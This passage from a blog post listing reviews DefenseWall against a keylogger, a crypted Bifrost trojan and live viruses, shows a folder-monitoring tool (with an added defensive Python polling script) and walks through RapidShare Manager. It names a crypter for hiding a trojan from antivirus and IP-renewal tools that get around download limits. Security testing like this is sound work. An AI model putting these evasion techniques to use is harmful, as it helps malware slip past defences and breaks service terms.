    WebWatcher, probably the most expensive and popular keylogger in the world at $169.95 per year, claims to bypass antivirus and firewall. There’s no trial for it and I had to pay the full price in order to test this. With DefenseWall running, I couldn’t get the WebWatcher keylogger installed until I turned off the HIPS protection. So I turned off the HIPS protection, installed WebWatcher, and DefenseWall didn’t detect any process reading keystrokes. I wouldn’t say DefenseWall failed this test because it managed to block WebWatcher from sending the keylogs and screenshot data to WebWatcher’s servers, making the keylogger useless.

    Test 3: Install a crypted Bifrost trojan
    I wanted to simulate a real scenario where a normal user unknowingly downloads a trojan from a website and then gets infected. I uploaded the Bifrost trojan crypted with Incognito to a website and then downloaded it to my test computer using Firefox, which is flagged as Untrusted by DefenseWall. I ran the trojan and DefenseWall managed to block it. I rebooted the computer and there was no sign of the trojan running in the background.

    Test 4: Run 20 different types of virus from a network share
    This is the last hardcore test which I did. I dropped 20 different viruses on another computer and shared the folder. Then on my test computer with DefenseWall installed, I accessed the shared folder that contains the 20 different types of virus and ran ALL of them! It created so much havoc on the test computer that it made Windows blue screen and auto reboot. To my surprise, when Windows booted up, everything was back to normal like nothing ever happened. By default DefenseWall categorizes network shared folders as Untrusted.

    As long as you run ANY malicious files as Untrusted, your computer will be fine. However when you want to install legitimate software like Kaspersky Anti-Virus, you must remember to run it as “trusted” or else the installation will fail. So if you’re unsure, always run it as Untrusted and see what happens. The feature that I liked most in DefenseWall is the Events Log. I am able to see what the untrusted file is trying to open or do to my computer.

    Other useful small features include file and registry rollback, which you can use to manually clean up the debris left behind on your hard drive by malware after an infection attempt. The “Go Banking/Shopping” button is a special browser mode that allows safe access to online banking. While in this mode, your information is protected from untrusted computer processes by terminating all untrusted processes.

    Please be informed that this is NOT meant to be a replacement for an antivirus, but you can run them together. DefenseWall does not protect from file drops, as many programs need to drop a file in order to run successfully (such as Firefox) and there is no security risk when a file is dropped (only when it is loaded into memory). Therefore, if the program is prevented from running in memory, we can classify this as protected. Your antivirus will be useful in detecting these malicious files that have been dropped onto your computer. DefenseWall is very light on your computer as it takes up only 14.6MB of memory and its peak is only 17.1MB.

    SoftSphere Technologies, the maker of DefenseWall, is very generous and kind to offer 75 one-year licenses worth over $2000 to Raymond.CC readers. If you would like to win a license, write a comment at the end of this article and I will pick the 75 winners 24 hours later. Your email will be sent to SoftSphere and they will be contacting you.

    [ Visit SoftSphere Technologies ]

    Update: 75 lucky winners have been randomly selected. Your email contact has been sent to SoftSphere and they will be contacting you.

  • Simple Real Time Track Folder Changes

    We have already covered RegFromApp where you can use it to track real time registry changes by injecting it into the process that you want to trace. Other than tracking what registry changes are being made to a computer, it is also equally important to track the changes on folders. Here is a simple tool called Track Folder Changes which you can use to track real time changes on folders that you specify. By default, Track Folder Changes tracks the whole C:\ drive where normally the operating system is installed. You can easily change the folder that you want to monitor by clicking the browse button. Upon running Track Folder Changes, it instantly displays in real time a tree with the list of created/deleted/changed files in a specific directory and its subdirectories. The coloring on the files helps to easily determine if a file is deleted, modified or created.


    Folder monitoring tools can be very useful to track installation or uninstallation changes and etc. In fact it can even be used to detect if there is a keylogger monitoring your keystrokes and saving them to a log file. Remember that Track Folder Changes is able to detect files that are being “modified” which means when the keylogger saves the keystrokes to a log file, Track Folder Changes will be able to catch it. However it will still require human intelligence to determine if the file is indeed used by a keylogger. Below is an example of detecting a DarkComet RAT trojan with keylogging enabled with Track Folder Changes.

    A .dc file located in TEMP folder constantly appears to be modified even after clearing the results.

    When the .dc file is opened with Notepad, it looks like a log file of captured keystrokes.

    As useful as it is, Track Folder Changes is not a hardcore tool that is able to work in all situations. I tried uninstalling iTunes while monitoring the whole C:\ drive with Track Folder Changes. When iTunes had finished uninstalling, Track Folder Changes stopped responding and Windows Task Manager showed that the process was taking up 100% CPU usage. After waiting a couple of minutes, Track Folder Changes displayed the changes and started to work normally again.

    My only gripe is that it lacks a pause button or an option to export to a log file so that it is easier to analyze the folder changes. If you have a process that is constantly making changes to the files and folders on your Windows computer, there is no way you can track or analyze the changes on files/folders.
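
    The folder-monitoring idea described above, as a small polling script (an added example, not part of Track Folder Changes or the original post): it snapshots a folder tree, writes created/deleted/modified events to a log file that can be reviewed later, and lists the files that keep changing between polls. The function names, the sample.dc file name and the poll interval are assumptions made up for this illustration.

```python
import os
import tempfile
import time
from collections import Counter

def snapshot(root):
    """Map every file under root to (mtime_ns, size)."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:  # file vanished or is locked; skip it this round
                continue
            state[path] = (st.st_mtime_ns, st.st_size)
    return state

def diff(old, new):
    """Return sorted (event, path) pairs describing old -> new."""
    events = [("created", p) for p in new.keys() - old.keys()]
    events += [("deleted", p) for p in old.keys() - new.keys()]
    events += [("modified", p) for p in old.keys() & new.keys() if old[p] != new[p]]
    return sorted(events)

def watch(root, rounds, interval, log_path, activity=None):
    """Poll root, append each event to log_path, count 'modified' hits per file."""
    hits, prev = Counter(), snapshot(root)
    with open(log_path, "a", encoding="utf-8") as log:
        for i in range(rounds):
            if activity:
                activity(i)  # hook used only by the constructed demo below
            time.sleep(interval)
            cur = snapshot(root)
            for event, path in diff(prev, cur):
                log.write(f"{time.strftime('%Y-%m-%d %H:%M:%S')}\t{event}\t{path}\n")
                if event == "modified":
                    hits[path] += 1
            prev = cur
    return hits

def repeatedly_modified(hits, min_rounds):
    """Files rewritten in at least min_rounds polls: candidates for manual review."""
    return sorted(p for p, n in hits.items() if n >= min_rounds)

def demo():
    """Constructed scenario: one file grows every poll, one never changes."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as out:
        noisy, quiet = os.path.join(root, "sample.dc"), os.path.join(root, "notes.txt")
        for p in (noisy, quiet):
            with open(p, "w") as f:
                f.write("start\n")
        def activity(i):
            with open(noisy, "a") as f:
                f.write(f"constructed line {i}\n")
        log_path = os.path.join(out, "changes.log")  # kept outside the watched tree
        hits = watch(root, rounds=3, interval=0.01, log_path=log_path, activity=activity)
        with open(log_path, encoding="utf-8") as f:
            lines = f.read().splitlines()
        return [os.path.basename(p) for p in repeatedly_modified(hits, 3)], lines
```

    A file that shows up in every poll is only a lead; as the post says, a person still has to open it and decide whether it is a keystroke log or ordinary application activity.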

    Download Track Folder Changes

  • RapidShare Gets Even Better with RapidShare Manager (RSM)

    Previously I’ve shared with you how to download multiple files from RapidShare automatically using Orbit download manager. If you don’t like to use Orbit, you can use a small DOS tool called gRapid to automate downloading of files without having to attend to them. Both methods require you to have a premium account. If you don’t have a premium account, you can use third party tools such as Cryptload or (E)lephant to renew your IP address and continue downloading without limits.

    Today I will share with you an official tool released by RapidShare.com. Finally RapidShare has their own free download manager to handle all downloads and uploads from RapidShare. This is of course if you have a premium account, you can make full use of the program. If you are a free user or have a collectors account, you can still use RapidShare Manager to upload your files to RapidShare.


    The RapidShare Manager (RSM) is a user friendly tool to upload and download files from RapidShare.com. The multiple setting possibilities allow professional uploading and downloading for beginners and experienced users. Upload is possible for premium, collector’s and free users. As for download, I’m sorry to say that it is only for Premium users UNLESS the file is set to direct-download.


    I will show you a short walkthrough on how to use RapidShare Manager to download multiple rapidshare links.

    1. Run RapidShare Manager and go to Account/Configuration tab.

    2. Click Add button at the login area and enter your login for premium account and password. Check use this account and click OK.

    3. Go to Download tab, and click Add button. Paste the rapidshare links at the top box and click Take Links button. You can also set the location where the downloaded files be saved to.

    4. Click Download button. You can set the maximum number of parallel downloads running. Maximum is 5. If you’re able to max out your download speed, then I’d advise you to set it to 1.

    RapidShare Manager requires you to have Microsoft .NET Framework installed. I found a small bug in the program, which is that you can’t add more than 1 RapidShare premium account. They should also add a feature to auto shutdown the computer after downloading finishes. From what I see, it’s still a very new download manager for RapidShare that works, but can be improved.

    One thing I’m unsure of is the upload limit for premium users. RapidShare’s website states that premium users can upload files with a file size up to 4000MB, but the program says up to 2000MB. No matter whether it’s 4000MB or 2000MB, files bigger than 100 MB can only be downloaded by Premium users, unless the files have been set to direct download and the traffic is paid by the file holder. I’m pretty sure not many people would actually upload files that big when you can easily split them.

    [ Download RapidShare Manager (RSM) ]